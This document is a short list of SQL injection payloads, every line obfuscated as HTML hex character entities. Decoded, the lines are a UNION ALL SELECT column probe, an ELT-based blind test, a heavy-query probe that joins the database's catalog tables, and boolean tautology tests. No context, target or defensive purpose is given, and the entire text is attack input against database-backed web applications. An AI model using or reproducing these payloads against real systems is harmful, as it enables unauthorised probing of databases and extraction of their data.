&#x22;&#x2d;&#x36;&#x39;&#x32;&#x34;&#x27;&#x20;&#x29;&#x20;&#x20;&#x75;&#x6e;&#x69;&#x6f;&#x6e;&#x20;&#x61;&#x6c;&#x6c;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x32;&#x30;&#x34;&#x36;&#x2c;&#x32;&#x30;&#x34;&#x36;&#x2c;&#x32;&#x30;&#x34;&#x36;&#x2c;&#x32;&#x30;&#x34;&#x36;&#x2c;&#x32;&#x30;&#x34;&#x36;&#x2c;&#x32;&#x30;&#x34;&#x36;&#x2c;&#x32;&#x30;&#x34;&#x36;&#x2d;&#x2d;&#x22;
&#x22;&#x31;&#x22;&#x22;&#x20;&#x29;&#x20;&#x20;&#x61;&#x73;&#x20;&#x7a;&#x75;&#x7a;&#x6d;&#x20;&#x77;&#x68;&#x65;&#x72;&#x65;&#x20;&#x31;&#x32;&#x31;&#x31;&#x20;&#x3d;&#x20;&#x31;&#x32;&#x31;&#x31;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x65;&#x6c;&#x74;&#x20;&#x28;&#x20;&#x35;&#x34;&#x35;&#x38;&#x20;&#x3d;&#x20;&#x32;&#x39;&#x36;&#x36;&#x2c;&#x32;&#x39;&#x36;&#x36;&#x20;&#x29;&#x20;&#x2d;&#x2d;&#x22;
&#x22;&#x31;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x20;&#x6f;&#x72;&#x20;&#x39;&#x36;&#x34;&#x33;&#x20;&#x3d;&#x20;&#x20;&#x28;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x20;&#x28;&#x20;&#x2a;&#x20;&#x29;&#x20;&#x20;&#x66;&#x72;&#x6f;&#x6d;&#x20;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x2e;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x73;&#x20;&#x61;&#x73;&#x20;&#x74;&#x31;&#x2c;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x2e;&#x63;&#x6f;&#x6c;&#x75;&#x6d;&#x6e;&#x73;&#x20;&#x61;&#x73;&#x20;&#x74;&#x32;&#x2c;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x2e;&#x74;&#x61;&#x62;&#x6c;&#x65;&#x73;&#x20;&#x61;&#x73;&#x20;&#x74;&#x33;&#x20;&#x29;&#x20;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x20;&#x20;&#x28;&#x20;&#x20;&#x28;&#x20;&#x20;&#x35;&#x38;&#x38;&#x38;&#x20;&#x3d;&#x20;&#x35;&#x38;&#x38;&#x38;&#x22;
&#x31;&#x27;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x32;&#x30;&#x30;&#x36;&#x20;&#x3d;&#x20;&#x32;&#x30;&#x30;&#x36;
&#x31;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x32;&#x30;&#x30;&#x36;&#x20;&#x3d;&#x20;&#x32;&#x30;&#x30;&#x36;
